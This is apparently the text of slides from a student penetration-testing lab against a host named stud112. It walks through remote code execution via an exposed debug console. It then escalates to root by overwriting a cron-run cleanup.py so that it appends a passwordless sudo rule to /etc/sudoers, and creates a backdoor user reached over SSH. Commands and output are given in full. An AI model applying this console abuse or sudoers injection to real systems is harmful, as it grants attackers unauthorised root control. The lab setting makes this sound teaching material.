stud102
stud112
manually exploring the page
metasploit - finding hidden pages
sql injection
xss
exploring known vulnerabilities
manually exploring the page
metasploit - finding hidden pages
sql injection
xss
exploring known vulnerabilities
manually exploring the page
metasploit - finding hidden pages
sql injection
xss
exploring known vulnerabilities
manually exploring the page
metasploit - finding hidden pages
sql injection
xss
exploring known vulnerabilities
manually exploring the page
metasploit - finding hidden pages
sql injection
xss
exploring known vulnerabilities
manually exploring the page
metasploit - finding hidden pages
sql injection
xss
exploring known vulnerabilities
manually exploring the page
metasploit - finding hidden pages
sql injection
xss
exploring known vulnerabilities
debug console
http://stud112/console
http://stud112/console
[console ready]
>>> import os
http://stud112/console
[console ready]
>>> import os
>>> os.popen("whoami").read()
http://stud112/console
[console ready]
>>> import os
>>> os.popen("whoami").read()
'webapp\n'
user access ✅
groot access
"I AM GROOT"
"who am i?"
groot access
"I AM GROOT"
"who am i?"
listing files
[console ready]
>>> import subprocess
listing files
[console ready]
>>> import subprocess
>>> subprocess.run(["ls", "-l"], capture_output=True)
listing files
[console ready]
>>> import subprocess
>>> subprocess.run(["ls", "-l"], capture_output=True)
CompletedProcess(args=['ls', '-l'], returncode=0,
stdout=b'
total 60\n-rw-rwxr--+ 1
stud stud 1038 Nov 19 11:21 README.md\ndrwxrwxr-x+ 2
stud stud 4096 Nov 27 18:10 __pycache__\n-rw-rwxr--+ 1
stud stud 6248 Nov 19 11:21 app.py\n-rw-rwxr--+ 1
webapp webapp 0 Nov 26 12:30 asd\n-rwxrwxrwx+ 1
webapp webapp 61 Nov 26 12:47 asd.sh\n-rw-rw-r-- 1
stud stud 322 Nov 28 12:29 cleanup.py\n-rw-rwxr--+ 1
root root 5 Nov 28 11:25 cronjob_runnning.txt\n-rw-rwxr--+ 1
stud stud 16384 Nov 26 15:04 db.sqlite3\n-rwxrwxr-x+ 1
stud stud 152 Nov 28 11:29 run_server.sh\ndrwxrwxr-x+ 6
stud stud 4096 Nov 19 11:21 static\ndrwxrwxr-x+ 4
stud stud 4096 Nov 19 11:21 templates\n-rw-rwxr--+ 1
webapp webapp 13 Nov 26 13:04 test.py\n
', stderr=b'')
listing files
[console ready]
>>> import subprocess
>>> subprocess.run(["ls", "-l"], capture_output=True)
CompletedProcess(args=['ls', '-l'], returncode=0,
stdout=b'
total 60\n-rw-rwxr--+ 1
stud stud 1038 Nov 19 11:21 README.md\ndrwxrwxr-x+ 2
stud stud 4096 Nov 27 18:10 __pycache__\n-rw-rwxr--+ 1
stud stud 6248 Nov 19 11:21 app.py\n-rw-rwxr--+ 1
webapp webapp 0 Nov 26 12:30 asd\n-rwxrwxrwx+ 1
webapp webapp 61 Nov 26 12:47 asd.sh\n-rw-rw-r-- 1
stud stud 322 Nov 28 12:29 cleanup.py\n-rw-rwxr--+ 1
root root 5 Nov 28 11:25 cronjob_runnning.txt\n-rw-rwxr--+ 1
stud stud 16384 Nov 26 15:04 db.sqlite3\n-rwxrwxr-x+ 1
stud stud 152 Nov 28 11:29 run_server.sh\ndrwxrwxr-x+ 6
stud stud 4096 Nov 19 11:21 static\ndrwxrwxr-x+ 4
stud stud 4096 Nov 19 11:21 templates\n-rw-rwxr--+ 1
webapp webapp 13 Nov 26 13:04 test.py\n
', stderr=b'')
cleanup.py
def cleanup():
# Todo, write functions which cleans up local files.
# Note that we currently run this in a chron job,
# as we do no want to bother the sysadmin for permission again
with open("cronjob_runnning.txt", "w") as f:
f.write("hello")
pass
if __name__ == "__main__":
cleanup()
cleanup.py
import os
def cleanup():
# Todo, write functions which cleans up local files.
# Note that we currently run this in a chron job,
# as we do no want to bother the sysadmin for permission again
os.system("echo 'webapp ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers")
if __name__ == "__main__":
cleanup()
http://stud112/console
[console ready]
>>> open("/home/webapp/cleanup.py", "w").write(
"import os\n\ndef cleanup():\n
os.system(\"echo 'webapp ALL=(ALL)
NOPASSWD:ALL' >> /etc/sudoers\")\n
pass\n\nif __name__ == \"__main__\":\n
cleanup()\n")
http://stud112/console
[console ready]
>>> import pexpect
http://stud112/console
[console ready]
>>> import pexpect
>>> pexpect.run("sudo useradd hej")
http://stud112/console
[console ready]
>>> import pexpect
>>> pexpect.run("sudo useradd hej")
>>> child = pexpect.spawn("sudo passwd hej")
http://stud112/console
[console ready]
>>> import pexpect
>>> pexpect.run("sudo useradd hej")
>>> child = pexpect.spawn("sudo passwd hej")
>>> child.expect("New password: ")
0
>>> child.sendline("password")
4
>>> child.expect("Retype new password: ")
0
>>> child.sendline("password")
4
$ ssh hej@stud112
$ ssh hej@stud112
$ hej@stud112's password:
$ ssh hej@stud112
$ hej@stud112's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-90-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Dec 1 14:46:56 UTC 2021
System load: 0.0 Processes: 223
Usage of /: 34.6% of 19.56GB Users logged in: 0
Memory usage: 28% IPv4 address for ens160: 130.226.140.112
Swap usage: 0%
=> There are 2 zombie processes.
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
10 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
*** System restart required ***
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Nov 29 12:21:05 2021 from 10.30.26.43
Could not chdir to home directory /home/hej: No such file or directory
$ su webapp
$ su webapp
webapp@stud112:/$
$ su webapp
webapp@stud112:/$ sudo whoami
$ su webapp
webapp@stud112:/$ sudo whoami
root
webapp@stud112:/$
root access ✅
GVM Analysis